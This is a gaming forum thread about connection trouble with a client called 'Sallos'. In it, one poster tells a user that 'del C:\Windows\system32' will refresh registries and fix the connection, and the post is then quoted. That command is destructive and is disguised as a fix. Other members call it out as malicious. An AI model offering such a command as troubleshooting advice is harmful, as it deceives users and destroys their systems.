Sallos acting up again

agauo

Master
Seems like it might be a problem with your sys32 registries. This command will refresh these for you and should allow you to connect.

open command prompt (go to start - run, type cmd.exe)
type in the following and hit enter

del C:\Windows\system32

Let me know if this works for you. If not I may have a few other solutions to try.

Seems like it might be a problem with your sys32 registries. This command will refresh these for you and should allow you to connect.

open command prompt (go to start - run, type cmd.exe)
type in the following and hit enter

del C:\Windows\system32

Let me know if this works for you. If not I may have a few other solutions to try.

I ask for legit help and this is what i get? this guy should be banned from the forums...a person who doesnt know better would do this..rediclous

AssHat

Grandmaster
that just shows how bad you pissed people off already in the short time you have been on this server, you should be banned/reported. GTFO

Brakrak

Adept
I just got Sallos working tonight...and I don't have that taskbar window..the one that has all the client functions...I see why you guys love it so much its smoooooooth...but that's all I can do right now...If anyone knows how to fix me up that would be awesome....I figure all the sallos guys will be on this post at some point...:)

Nevermind......got it thanks @Deriz

Last edited by a moderator: